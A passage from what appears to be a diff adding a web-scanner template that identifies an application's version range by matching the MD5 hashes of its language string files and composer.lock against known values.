type: dsl + name: 1.0.0 + dsl: + - "(\"65d4c6549f6e9d33d1fc4d6c9d2bc506\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"ec9d0f0270aa1978db2da36c12196384\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"698c86558c9f84ff43f4229467c1cc4b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"ed5f1cb304748bcf259ed6a64487997d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"01c75123ee448fceab5886f414cf1e2c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5ec84522caeb3f06df5e50f18c6b07bd\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + 
dsl: + - "(\"64a33624b6a80a8ed20061e53f05c2d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.11.1 + dsl: + - "(\"41045b1e380431b2f95281014372fbe2\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"0095990bf4292284ab7b356bb9950a8f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"28a84024709bb922a43f5258719e32f1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"5eb30525bf1e13d4cd922d7794fe15c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"f9709452a5ad18b597c4272e35fed149\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f70b2c5a78d6e6ec7870226934f5afa5\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8ebbcf040efdf8b88450003dab35b458\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"87e063070c41eb7c9529e76141842cec\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"5cfd1f2ff69181aa7ca2a136d631b8f9\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"cad2f84adcda262b1f4d6097811396df\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"0ca9568e6f9c9b982b046708c8504673\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e051a4f09d9bf5fa0c7e02fb8f3bc2ad\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e917feb832aabae5574dbe478011e9c5\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cfa1e4e704072e15fa103553a7a9a390\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"422a0c12f11bbf3f7a732c4498e94db3\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"5631cbb1b11dd1abeb6f597617e70a73\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d92be31c984915a39da49023623b0be7\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"be905189d2c73fa600e0fe2488ba2bf1\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - 
"(\"90ef3ca38eba9084c7aa93d22efa64f3\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"57c6e46d970e7a07e29d74d57a48942e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"289c32600bf71c8ee3f233642954ccff\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"88b113966210243857249696b3731e01\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"85aed2ebe277217bc950d47e9acf4f0f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"a572de12f64bc44f2d5db74127b94b5a\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"2bb96ba7f4e42c8d3179acc665a65841\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"1f1a4ec2b7d8d9210e7de07663ee95ad\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2613067a0b730b93fce16308eb120129\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3f2683668b96f777670a8ba3eac44de4\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"9dc65957836083d4c5266ae74356998d\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"457321020f946a34916d1ceee3a372d6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7652e1825d965e8e4db5757cf9b16a24\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"bf84acebb4c0a47429035de60da3c2e4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"2c4e76c85a7711fa6822ce0bdc29c09b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"c6443ba4eea184cbdf52ba670189344d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3e9108e7e9f0919a2f581657c1038060\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"4c3e262695b2515362624f65ad318a92\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4e62a881975b03598aec63702bb48067\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - 
"(\"90bbf23aa5514c5a6c5a8fe65f8020fb\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"fdc4da12769c36e966f83ec9592ea4f9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"1433c40320a63977a9130a98d4604fd7\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"41828817e0b59cbdd36a9c918f6f0a92\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"8e0c3f5b06f29c7a7757749934d4e719\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f9b890063de92ee7c84f4f21e5c6950a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"0643fe7c47d5c7068e47a332e15de071\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"c6e5d0b7c821270fb6d437e4f8381346\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"a86be9c5f80e5f7ea741a33e4756b1bd\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5d1137bc78e0e2deaf4c90f351a40bbd\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0b8f15a8e5d74073b7dbfd6218187f2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"b4a33b03b32107511ab84abdb999240f\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"b78a81c0a7823360215dc5c51fe5abba\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"68d7d1d77c7af00a8c3aa38e6fe2f6bf\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"2858621dcaa78ca68940951ef9658cc1\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"8973c98e43648f54548113ee46faca7f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"48f554a45197ae838b27f90513ff92a1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ff025bc7c7e80086e07f0988aa1c95be\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"4b929ff78078ef7c1fd3ccc6c283723c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + 
- "(\"c2a596eff0fc0ea90758c492adfe67ac\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"378fc5becea802556d7e46287c459343\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"539370494eb75c4e7300c5a55ef62b16\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"abf364d7e4313d7a53168a48a24c6ce3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"62055fe4d36ea8193fac2bd892504602\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"994d0dd53c86b86b5339fa8ddd455346\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2148f58b0e7c05dcb0b949af6973fd71\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d93b9a3936eefd681c5e33a086f2481c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f2e136e89879d7ca3b8765bf9eaedd22\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"288782bac427f102544b2d6800a1044a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"9d396b30e3c64540c56c010b3487025f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"3e9f2326b247d10d673e15c00697353f\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"1b1eb0cf70b38653245c03cec7d25362\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"385cc3530994c85f04bdd595dbfd8f0a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c94da30340c94a99dd8c8079e1f9c765\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a2ccb0879d10a9f0c9123247e2a30d07\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"26a9f42a837d546b1917e18ba2b6c4fa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"8fcdb92778673e05bc7770173743d5d6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d6337588f1bc8e83c5583e574f764ed5\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - 
"(\"8348f89278c44874501eacd6a17f2824\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"8cbbefb1e1caea9b30cffa18d3d1fbc0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"a7d120059bb10dc0692240b5a868e534\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"c0249ea5162326e924b65d2ca5ad2b3e\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"15346bbc6531e2e5ef766cce97ef0d01\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"879ed9dca02390d6a7f46aa7a606da43\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"be06934f2192f02c94dde7ab591081ac\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"7bbe2827c94e8d7e9364cfda370c7868\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"15daa5872b646f88ff3d19381d976978\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"963e6cccfc551f665243887d1e9d6082\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"afda5c611bdeca2e6999c2643edc2f1e\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"705207608900e87d2ab51c9afeab9e76\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"d764fc87395a9bf0bc66b6f8b92140b4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"12676475d5ae48d1e1b2042c1edf6889\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5873e5a492f38ea76ba8cd3906ca21e6\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"d9de89c53457d16fc979a47756919cca\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"761be5cc5e406bc53b3cb6ed1caf1353\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"636621d5f1e18fc9cca9cd43f4cf4d85\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.11.1 + dsl: + - "(\"d4f9777bf5bafc739667d0dc388a7a93\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - 
"(\"6fbe51f54f90d60835e7c34d69e71589\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd95896edd542c6f0fecdcfd34b565df\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"f55cdc8e395527acce544c1ac71599de\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"572ae8987f5a0ea01787a6aa510d4476\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"7265cdd72310c9636fdc06a79b927491\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2783e4731a370653f282edfff323509d\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"66f732836b43af91f875973e040bea3b\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"509d56de9bb9f15f4f909852c0e2b209\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"2f50c7dfd16e6cbd087fd554fef73f79\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"a5998e359035164dfc1421d8ea3fd15b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"8fbd2458dcf35fe9be5b025f9b69dccf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"8c7af6e2deb2115891e109040f43fffa\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1ff24c14c0e6a80893301d5986b65e36\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9c0184d70bf09f64b9656ef053e7d686\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5824137f110982c9a5abded014738484\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5e2f855a6325fc704683dd17cfe129e8\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"0fea818c14c81e5203e1f016310517bd\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"de083965afefb1a272360adc7fdc1abe\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0c494d53eae8e9b99dddb0cd2f900a9e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"19d66d1c7dc7f4d90bded20b52350a34\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.7.1 + dsl: + - "(\"1a1501f9bb3cebcab2235d3d997879b8\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"033ffd217384e85e344743f48a651558\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"71e01d14bd75df57520e86e0717d9672\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"2dccd72eeaba5f657363daed413eb077\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ef2fef72efc97b441bd348eb2bc2ee88\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"130dc9f84277fe3c38431ed92b99eb94\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"85c93d39ebd6ec2372f81cadbe6fb613\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"bb3bf13f39b5e251d6213a97dd4025ed\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af050211e5e609ae11cf7b2e187960b3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"280a5a4bb4401e57cb260fc8056f5ea5\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ac8d060b8b8e4d625c64d9655ce79752\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"85bd48ac6f5224bbc792db899b91322f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"c8bd9a0ff1d373d6ca28c62d0d6376ab\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"a1e195cde329568cd805474c96989ce2\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"e5b8a401df67d1d42b8d40a592fcf1dc\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"fcb2be7f83c4f71a5656539491df901d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"18309751ece1279c3612c214260a4d1c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"17af771e8df42de347a52d4f54a63d46\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4914951d4069b06e0f0fbf7915a495cc\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - 
"(\"ee99ad481a578ed7fb09a60bc824fa84\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c4c8d54edf304c639f611a7be9336f8f\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"5199b095c29e16e72468be65d83cdaee\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"98594a960efdfa708178e98f26a6b0a0\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"0c288a4062e6753818318b580b4099f5\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"400723d1e58c830b7936b897741c4379\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"7cda2ab7eddad368935bede6f861e228\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.11.1 + dsl: + - "(\"76242c86eab437aa7452d084d76d74ec\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9931f4d7f7bf87ae822de62a48d84c33\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"73a9c84fefa8af310bae0c49def73df3\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"db5ab33f0c45e98cc8213a3dc75f442d\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"6e1f5641d4b0372bc2b6f760ec43fdde\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"c7bde16da39650d3c85a25e782f88e3a\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"48af7f005dcbcff2882f91e037a073d1\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"da2739272aa310b3a446f4b03959093f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"0003c6fde54b2bd3dd60f07c04446ce9\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"851420ea5844908bc636e511a88990af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/composer.lock" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"7ba4b1486d3e85b3f40c688629bce965\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"a5bdb43d887009fba95e1d2ffb4157b2\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + 
- "(\"b2baca8bf95bc558959b83103d97efe3\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"7b332f433c559ce15c5370b351af4911\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.0 + dsl: + - "(\"8b015cbc2147000df6e347f5273f6bb3\" == md5(body))" + - type: dsl + name: 2.12.1 - 2.13.2 + dsl: + - "(\"9a66c545a8a748a4ec8f5efe371bf9ea\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.18.0 + dsl: + - "(\"5435f4ee2e1fafccb0242a274d457cc4\" == md5(body))" + - type: dsl + name: 2.19.0 + dsl: + - "(\"66b1df02c7565a864f79685f24942684\" == md5(body))" + - type: dsl + name: 2.18.1 + dsl: + - "(\"faef7be7408615eb2d40e17c82bd2bf2\" == md5(body))" + - type: dsl + name: 2.20.0 + dsl: + - "(\"19443f96eeadd4fec33386168bb162c2\" == md5(body))" + - type: dsl + name: 2.19.1 + dsl: + - "(\"21f5bd7edc9e23e2f0037b3013ff6439\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"c7f6735fe82befcdb3407b32eb2cf67a\" == md5(body))" + - type: dsl + name: 2.20.1 + dsl: + - "(\"28542416ec1ab82c0ab42439673b4436\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"188ad61f5f6f06c1114176d2307aadc9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3a9c05e196c8ac7afecbc435044a34b3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.1 + dsl: + - "(\"c0c084696f2fb41a14e5a94c0db2dadd\" == md5(body))" + - type: dsl + name: 2.24.2 - 2.24.3 + dsl: + - "(\"7cd766a52c0a06c0784c7db45344e793\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"7afcb71d3737045eed559a00aab6185b\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"76c2175804e5d3177601684851756ce4\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"2e30a321b2b2735182dfdc31de67d2aa\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"25120fd17aff050620ba51fd3c1ceda8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - 
"(\"00c0e18d8ac127c7143250c71aee61ec\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0de0a0dca2bcce14b2474453b34dc224\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"87f26140871eee5e4a29be3955a17ba8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"c0fc7b6610223d8740898fd0c40912fc\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"80eac74f56f9f63e9c62bc9d9f14381b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"0db98880b11e1f76133f24be8b9229d6\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"13b37b7608788010a3f0bf2857295b62\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9e090a22700c8f5678c5e0bd015aa543\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7fd8f5ac59988a4bc6f4408ad98bc9e5\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f9481adbe5ee6836a75160782dda2072\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"d396f7513e9ef5015ffdda8a5f43e728\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"bb3feab555a9fd5a49ae739fc8437621\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"4335aecb5ce09136c8619752a81311b2\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"aecf0dc2b56b5eea801ebf241442dd20\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"5d52fcbe5ebaa22142eea2d3fab146e2\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"a3d098d61755751c65c78dcc623bd4f1\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"f4b74cfc224670309c1e4509803267b0\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"0b5fa4eae94bb915647d39aaa874b8b2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"8eef916cdd688b9cdac9df8ba6b47de0\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"084cc93f2765e6b25a1f7b7918f84292\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - 
"(\"119cb85fd76d1932e9f73767c95d2c15\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"48042a3e6018813b156961ffb19d9fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_urdu.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.8.1 + dsl: + - "(\"5f126a9761bd7a210b3c1bdd0b387017\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"3a976de274eaf80a448a5d6c9db8ee04\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"175409d997221d661a626e167b0b08b1\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"96e8e474dad8a37544afe8de796e7871\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"6d28b1f321599d27c1c439e6f3038ac6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9ba69f2a907185db66886e868458eef8\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9d5529d9df822143ae4f5176323f717d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"82bc201b83c3a13acf228e58ff2f8c44\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"40b59965a4f8c014a09988c1340bbc45\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d90deef6a09a7f65bcab27276a91c8c9\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"2f23776ce4f1a395510f3eb8c194a6de\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"53a2b00ad50db745ba37310b84a699ba\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6cf220ffcbdae0918a8ae7d159fdeec6\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"32617f856bc713cca7888122fdfe367c\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"de8f623a140b68e8602c16e2d6129eba\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"63f77be015379140e93f11d4e85bc6fd\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"480629341f4b69723f3dc86e80041b90\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - 
"(\"729cf5ba88453fac93d47c82481ccf31\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"d8b3e53c9fdf591d39044ded91c7966a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"2a393cb0bd279fc13344e0df7aa4711b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"e2703d0e2f0b6ff1fa3f6b2eae63b19f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"e36384e6a1abdbb81688a0ae050753fa\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"14769bd06486b17d5122312bd39ab6e3\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"86cf88244860a659ea1b97b651579b1f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7ba474f2683ab107cec54ca0ae5d2c17\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.12.2 + dsl: + - "(\"168365cdde4c467d3a6a25fe7d58956f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"bf98f6fa7e8b7051746bce928564cce4\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - 